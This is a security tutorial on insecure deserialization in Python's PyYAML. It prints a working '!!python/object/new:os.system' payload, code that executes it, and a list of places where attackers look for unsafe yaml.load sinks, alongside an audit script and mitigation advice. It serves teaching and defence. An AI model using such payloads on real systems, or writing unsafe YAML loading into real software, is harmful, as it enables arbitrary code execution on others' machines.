Insecure Deserialization - Unsafe YAML Loading

Python-based Vulnerabilities Anatomy

YAML (YAML Ain’t Markup Language) is a human-readable data serialization format commonly used for configuration files and data exchange.

In Python, the PyYAML library is widely used to parse YAML content. However, improper use of this library, particularly the use of unsafe loading methods, can introduce a serious security issue.

PyYAML is not a built-in Python package; it is a third-party library that must be installed separately. Despite this, it is used across many Python applications, particularly for parsing configuration files, managing structured data, and integrating with tools that rely on human-readable serialization formats.

Unsafe YAML Loading Using `yaml.load()`

The yaml.load() function can construct arbitrary Python objects from YAML input when it is given an unsafe loader. If user-controlled data is passed to it, an attacker can execute arbitrary code or load dangerous objects during deserialization.

The following code demonstrates how YAML payloads can be deserialized using two different loaders, Loader and UnsafeLoader:

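import yaml
from yaml import Loader, UnsafeLoader

# When deserialized, runs `id` and redirects its output to /tmp/yamled.lol.
payload = b'!!python/object/new:os.system ["id>/tmp/yamled.lol"]'

def load_yaml_unsafe_loader(data):
    # UnsafeLoader constructs arbitrary Python objects from tags.
    return yaml.load(data, Loader=UnsafeLoader)

def load_yaml_with_loader(data):
    # The legacy Loader honors the same Python-specific tags.
    return yaml.load(data, Loader=Loader)

load_yaml_with_loader(payload)
load_yaml_unsafe_loader(payload)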

Both loaders will execute malicious content if used with untrusted input.

We used the payload !!python/object/new:os.system ["id>/tmp/yamled.lol"], which is a malicious YAML string designed to exploit insecure deserialization in Python using the PyYAML library.

It instructs PyYAML to construct a new object by calling the os.system function from the standard library, passing it a string argument.

The argument provided is the shell command id>/tmp/yamled.lol. This command runs the id utility and redirects the output to the file /tmp/yamled.lol.
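To make the mechanics of the tag concrete, here is a simplified model of what the loader does with it: resolve the dotted name after the colon to a callable, then call it with the YAML sequence as positional arguments. This is an illustrative sketch, not PyYAML's actual code (the real constructor also handles classes, keyword arguments, and object state). The helper names resolve_dotted_name and apply_tag are hypothetical, and posixpath.join stands in for os.system so the example is harmless.

```python
import importlib


def resolve_dotted_name(name):
    """Resolve 'module.attr' to the object it names, importing the module first."""
    module_name, _, attr = name.rpartition(".")
    module = importlib.import_module(module_name)
    return getattr(module, attr)


def apply_tag(tag, args):
    """Simplified model of '!!python/object/new:<name> [args]' for a plain function."""
    prefix = "!!python/object/new:"
    if not tag.startswith(prefix):
        raise ValueError("unsupported tag")
    target = resolve_dotted_name(tag[len(prefix):])
    # The attacker chooses both the callable and its arguments.
    return target(*args)


# Harmless stand-in for os.system: join two path components.
print(apply_tag("!!python/object/new:posixpath.join", ["/tmp", "yamled.lol"]))
# prints /tmp/yamled.lol
```

Swapping the name for os.system and the argument for a shell command is all the real payload does, which is why no gadget chain is needed.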

Running the code using either load_yaml_unsafe_loader() or load_yaml_with_loader() will result in the execution of the malicious payload.

Both functions use yaml.load() with loaders (UnsafeLoader and Loader) that support full object deserialization, including the ability to invoke arbitrary functions.

As a result, the payload triggers the execution of the command id > /tmp/yamled.lol. This creates a file at /tmp/yamled.lol and writes the output of the id command into it, as shown below:

hackpad :: /opt/PyFu/generic-py-fu » python3 unsafe-yaml.py 
hackpad :: /opt/PyFu/generic-py-fu » ls /tmp/yamled.lol  
/tmp/yamled.lol
hackpad :: /opt/PyFu/generic-py-fu » cat /tmp/yamled.lol 
uid=1001(user) gid=1001(user) groups=1001(user),27(sudo),100(users)

Unsafe YAML Loading Using `yaml.unsafe_load()`

Another function capable of triggering object deserialization in PyYAML is yaml.unsafe_load().

This function is equivalent to calling yaml.load() with UnsafeLoader: it allows PyYAML to parse YAML documents that contain Python-specific tags, such as !!python/object/new, and reconstruct arbitrary Python objects during the loading process.

While unsafe_load() is explicit in its name, it is just as dangerous as using yaml.load() with UnsafeLoader or Loader.

The following code demonstrates the use of yaml.unsafe_load() to deserialize a malicious YAML payload:

import yaml

payload = b'!!python/object/new:os.system ["id>/tmp/yamled2.lol"]'
yaml.unsafe_load(payload)

When this code is executed, the yaml.unsafe_load() function processes the payload and executes the embedded command. The payload instructs PyYAML to invoke os.system with the argument id > /tmp/yamled2.lol.

hackpad :: /opt/PyFu/generic-py-fu » python3 unsafe-yaml2.py 
hackpad :: /opt/PyFu/generic-py-fu » ls /tmp/yamled2.lol 
/tmp/yamled2.lol
hackpad :: /opt/PyFu/generic-py-fu » cat /tmp/yamled2.lol 
uid=1001(user) gid=1001(user) groups=1001(user),27(sudo),100(users)

Running it in the lab

docker compose run --rm generic-py-fu sh -c "python3 unsafe-yaml.py; cat /tmp/yamled.lol"

uid=0(root) gid=0(root) groups=0(root)

The payload !!python/object/new:os.system ["id>/tmp/yamled.lol"] uses an object-construction tag. yaml.load(..., Loader=UnsafeLoader) honors it and calls os.system, whereas yaml.safe_load would have refused it outright. As the output shows, the command ran as root inside the lab container.
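The refusal can be checked without running anything dangerous. The sketch below assumes PyYAML is installed; rejected_by_safe_load is a hypothetical helper name, and it relies only on yaml.safe_load raising a yaml.YAMLError subclass when it meets a tag it has no constructor for.

```python
import yaml

payload = b'!!python/object/new:os.system ["id>/tmp/yamled.lol"]'


def rejected_by_safe_load(data):
    """Return True if yaml.safe_load refuses to construct the document."""
    try:
        yaml.safe_load(data)
    except yaml.YAMLError:
        # safe_load has no constructor for python/* tags, so nothing is executed.
        return True
    return False


print(rejected_by_safe_load(payload))        # object-construction tag
print(rejected_by_safe_load(b"port: 8080"))  # plain data loads normally
```

With the payload above the first call should report a rejection, while the plain mapping loads as ordinary data.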

Why unsafe YAML loading matters from an offensive security perspective

I prize unsafe YAML loading because it gives me pickle-grade code execution through a format that everyone treats as benign configuration data. A !!python/object/new:os.system tag is honored by yaml.load with Loader or UnsafeLoader, by yaml.load with no Loader argument on PyYAML releases before 5.1 (where the unsafe Loader was the implicit default), and by yaml.unsafe_load, so I never need a serialization endpoint, just a place where my YAML reaches a load call. The call site looks like harmless config parsing, which is exactly why the sink survives review.

What an attacker prizes is the gap between perception and behavior. YAML is the language of config files, CI pipelines, and API request bodies, so developers feed it user input freely, and yaml.load was the documented default for years. The result is a deserialization sink sitting in places nobody classifies as a deserialization surface.

Where I look for a reachable sink in an assessment:

- API endpoints accepting application/yaml or config-import features that round-trip user YAML through yaml.load.
- CI/CD and pipeline definitions parsed by Python tooling, where I influence the YAML a runner loads.
- Kubernetes/IaC and plugin manifests read with an unsafe loader instead of safe_load.
- Webhook and integration payloads that arrive as YAML and get loaded for convenience.
- “Restore settings” / “import profile” features that accept an uploaded YAML document.

The audit tell is any yaml.load without an explicit SafeLoader, or any yaml.unsafe_load, on data an attacker can influence; the missing safe_ is the whole bug. For defenders the takeaway is to treat a reachable yaml.load with an unsafe loader on untrusted input as equivalent to eval.
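That audit tell is mechanical enough to script. The following is a minimal sketch using only the standard-library ast module; find_unsafe_yaml_calls and SAFE_LOADERS are hypothetical names, and the check is deliberately naive: it only matches calls written as yaml.<name>(...), so aliased imports such as "from yaml import load" are missed, and it cannot tell whether the data is attacker-controlled.

```python
import ast

# Loader names treated as safe in this sketch (an assumption; adjust as needed).
SAFE_LOADERS = {"SafeLoader", "CSafeLoader"}


def _loader_name(node):
    """Return the trailing identifier of a Loader expression, e.g. yaml.SafeLoader -> 'SafeLoader'."""
    if isinstance(node, ast.Attribute):
        return node.attr
    if isinstance(node, ast.Name):
        return node.id
    return None


def find_unsafe_yaml_calls(source):
    """Return sorted (line, reason) pairs for suspicious yaml.* calls in Python source text."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Only the attribute form yaml.<name>(...) is recognized.
        if not (isinstance(func, ast.Attribute)
                and isinstance(func.value, ast.Name)
                and func.value.id == "yaml"):
            continue
        if func.attr in ("unsafe_load", "unsafe_load_all"):
            findings.append((node.lineno, f"yaml.{func.attr}"))
        elif func.attr in ("load", "load_all"):
            loader = None
            for kw in node.keywords:
                if kw.arg == "Loader":
                    loader = kw.value
            # The loader may also be passed as the second positional argument.
            if loader is None and len(node.args) >= 2:
                loader = node.args[1]
            name = _loader_name(loader) if loader is not None else None
            if name not in SAFE_LOADERS:
                findings.append((node.lineno, f"yaml.{func.attr} with Loader={name}"))
    return sorted(findings)


sample = """import yaml
a = yaml.load(data, Loader=yaml.Loader)
b = yaml.load(data, Loader=yaml.SafeLoader)
c = yaml.unsafe_load(data)
d = yaml.safe_load(data)
e = yaml.load(data)
"""

for line, reason in find_unsafe_yaml_calls(sample):
    print(f"line {line}: {reason}")
```

On the sample, the sketch flags lines 2, 4, and 6 and leaves the SafeLoader and safe_load calls alone. Each hit still needs a manual check that attacker-influenced data can reach it.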

Mitigation

The fix is to call yaml.safe_load (or pass Loader=yaml.SafeLoader explicitly) for any YAML that crosses a trust boundary. This restricts parsing to plain data and refuses the object-construction tags that yaml.load with Loader or UnsafeLoader, and yaml.unsafe_load, will execute. Reserve the unsafe loaders for documents you produced yourself, and validate the decoded data against an expected schema rather than trusting whatever types the document declared.
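The schema-validation step can be as small as a type check on the decoded value. The sketch below is one possible shape, not a prescribed implementation: validate_config and its three-field schema (name, port, debug) are hypothetical, and the input dict stands for whatever yaml.safe_load returned.

```python
def validate_config(doc):
    """Check a decoded YAML document against a small, hypothetical schema."""
    # Hypothetical schema: field name -> required Python type.
    schema = {"name": str, "port": int, "debug": bool}
    if not isinstance(doc, dict):
        raise ValueError("top-level value must be a mapping")
    unknown = set(doc) - set(schema)
    if unknown:
        raise ValueError(f"unexpected keys: {sorted(map(repr, unknown))}")
    for key, expected in schema.items():
        if key not in doc:
            raise ValueError(f"missing key: {key}")
        value = doc[key]
        # bool is a subclass of int, so reject True/False where an int is expected.
        if expected is int and isinstance(value, bool):
            raise ValueError(f"{key} must be int, not bool")
        if not isinstance(value, expected):
            raise ValueError(f"{key} must be {expected.__name__}")
    return doc


# In real use, `decoded` would come from yaml.safe_load(untrusted_text).
decoded = {"name": "svc", "port": 8080, "debug": False}
print(validate_config(decoded))
```

Rejecting unknown keys and wrong types up front means the rest of the application only ever sees the shapes it was written for.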
